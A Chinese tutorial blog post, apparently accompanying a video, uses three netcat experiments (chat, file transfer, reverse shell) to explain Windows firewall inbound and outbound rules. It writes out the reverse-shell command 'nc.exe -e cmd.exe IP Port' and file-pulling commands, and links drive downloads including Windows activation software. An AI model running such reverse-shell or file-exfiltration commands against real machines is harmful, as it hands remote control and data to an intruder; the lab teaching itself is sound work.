[Win基础]-6-实战用三个nc实验理解防火墙策略
引言
这篇文章通过一个模拟实战,利用nc这个工具,来理解防火墙出站入站策略对访问数据的影响。
文章目录
0×1.视频中用到的nc命令解析
首先,来看看nc是什么,根据诸多文档的描述,nc是一款功能强大的网络工具,在网络工具中有“瑞士军刀”美誉,并且有Windows和Linux两个版本。因为它短小精悍,功能实用,被设计为一个简单、可靠的网络工具,可通过TCP或UDP协议传输读写数据。同时,它还是一个网络应用Debug分析器,因为它可以根据需要创建各种不同类型的网络连接。
在渗透测试中,nc多用来作为反弹shell的接收端,就是因为如此,nc在诸多杀毒软件中,都会被当做病毒查杀。
视频中用到的命令:
#下面代码中1234为演示用的端口号,可以自定义,IP替换为服务器的IP地址,Port替换为服务器的端口号,例如:本列中如果监听端用1234,那么Port就替换成1234,与监听端一致即可
# 1.nc聊天:
//被动端监听
C:\Windows\System32> nc.exe -lvvp 1234
//主动端连接
C:\Windows\System32> cn.exe IP Port
# 2.nc传输文件:
//监听的方式接收文件
C:\Windows\System32> nc.exe -lvvp 1234 > filename
//主动端发送文件到对端监听的端口
C:\Windows\System32> nc.exe IP Port < filename
//监听的方式发送文件
C:\Windows\System32> nc.exe -lvvp 1234 < filename
//直接去目标服务器取文件
C:\Windows\System32> nc.exe IP Port > filename
# 3.nc反弹shell:(重点)
//监听端:
C:\Windows\System32> nc.exe -lvvp 1234
//反弹端:
C:\Windows\System32> nc.exe -e cmd.exe IP Port
0×2.nc实验理解防火墙策略视频演示
点击下方视频标题,可以进入B站观看高清版本
【第10天】Windows基础-10-实战用三个nc实验理解防火墙策略-windows防火墙入站出站搞不清?开始炫~大一女新生挑战一年精通网络安全-信息安全-计算机安全-计算机技术-黑客技术-渗透测试,我无所畏惧
视频中用到的「nc」来自UC网盘分享:
*「nc工具-windows版64位」:点击打开 密码:wSZU
第一篇文章中演示的虚拟机的下载可以通过我这个uc网盘去下载,里面包含了很多现成的系统镜像,还有虚拟机的激活码,也可以去官方下载,千万别去其他地方下精简版,很多问题都出在这里。网盘包含了最新的Windows+激活软件,流行的Linux镜像,会持续更新。
*「虚拟机全套软件+ISO镜像文件」(会一直持续更新):点击打开 密码:8s6H